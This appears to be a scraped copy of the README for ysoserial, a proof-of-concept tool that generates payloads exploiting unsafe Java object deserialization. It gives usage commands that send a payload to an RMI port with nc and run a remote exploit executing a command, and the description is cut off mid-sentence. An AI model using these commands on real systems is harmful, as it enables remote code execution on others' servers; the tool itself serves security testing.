## https://sploitus.com/exploit?id=D1AAF3FC-ADD3-503D-A849-2064C2E754FD
# ysoserial
[](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar)
[](https://travis-ci.com/github/frohoff/ysoserial)
[](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master)
[](https://jitpack.io/#frohoff/ysoserial)
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

## Description
Originally released as part of AppSecCali 2015 Talk
["Marshalling Pickles: how deserializing objects will ruin your day"](
https://frohoff.github.io/appseccali-marshalling-pickles/)
with gadget chains for Apache Commons Collections (3.x and 4.x), Spring Beans/Core (4.x), and Groovy (2.3.x).
Later updated to include additional gadget chains for
[JRE groovypayload.bin
$ nc 10.10.10.10 1099 < groovypayload.bin
$ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
```
## Installation
[](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar)
Download the [latest release jar](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar) from GitHub releases.
## Building
Requires Java 1.7+ and Maven 3.x+
```mvn clean package -DskipTests```
## Code Status
[](https://travis-ci.com/github/frohoff/ysoserial)
[](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master)
## Contributing
1. Fork it
2. Create your feature branch (`git checkout -b my-new-feature`)
3. Commit your changes (`git commit -am 'Add some feature'`)
4. Push to the branch (`git push origin my-new-feature`)
5. Create new Pull Request
## See Also
* [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet): info on vulnerabilities, tools, blogs/write-ups, etc.
* [marshalsec](https://github.com/frohoff/marshalsec): similar project for various Java deserialization formats/libraries
* [ysoserial.net](https://github.com/pwntester/ysoserial.net): similar project for .NET deserialization